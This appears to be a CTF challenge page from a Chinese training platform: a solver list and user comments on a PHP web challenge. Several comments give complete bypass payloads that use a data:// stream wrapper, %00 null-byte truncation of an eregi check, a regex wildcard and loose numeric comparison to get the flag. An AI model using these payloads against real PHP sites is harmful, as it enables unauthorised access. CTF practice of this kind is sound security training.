评分(26)
解题动态
seedis 攻破了该题 1天前
0xchang 攻破了该题 1天前
scv 攻破了该题 1天前
213qwe 攻破了该题 1天前
李逍遥逛霍格沃茨 攻破了该题 2天前
kiritoldws 攻破了该题 2天前
13966774026 攻破了该题 4天前
jsbba 攻破了该题 4天前
sdgkk1234 攻破了该题 5天前
rf123 攻破了该题 6天前
wes 攻破了该题 6天前
2kniden 攻破了该题 6天前
乱来小木 攻破了该题 6天前
baka 攻破了该题 7天前
lanza2451150 攻破了该题 7天前
ctfcaiji9527 攻破了该题 8天前
SkyAsh 攻破了该题 9天前
南京交通第一深情徐立超 攻破了该题 11天前
陌兮li 攻破了该题 12天前
评论
霓虹 20天前
举报
wp解答的源代码不一样,避雷
对对对对对对对对 2月前
举报
依旧有点意思
soha 2月前
举报
$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参
caicai0728 3月前
举报
解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501
2686213396 6月前
举报
bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag
iNMB 6月前
举报
?id=00&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=&b=......
zhuizhui 7月前
举报
?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14
breeding 7月前
举报
curl '<ip:port>/1p.html'获取到word的值,先url解码,再把解码得到的注释用base64再解一次码就可以得到php源代码了,根据源代码构建url参数:/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20platform!&b=.12345
shingu 10月前
举报
参数b被卡住了。怎么即是4又不能等于4。看了WP才知道,原来是用了%00截断符。
breeding 7月前
举报
也可以直接用“.123456”,因为只截取b的第一个字符接在111的后面当正则模式串,“.”直接通配
ymkiras 10月前
举报
值得注意的是,很多题解bp用的版本有点低,像我用的新版就不能按题解来,所以用data代替input: GET /hello.php?id=0e123456&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111 HTTP/1.1 这里空格用%20代替
iNMB 6月前
举报
也可以使用data://text/plain;base64,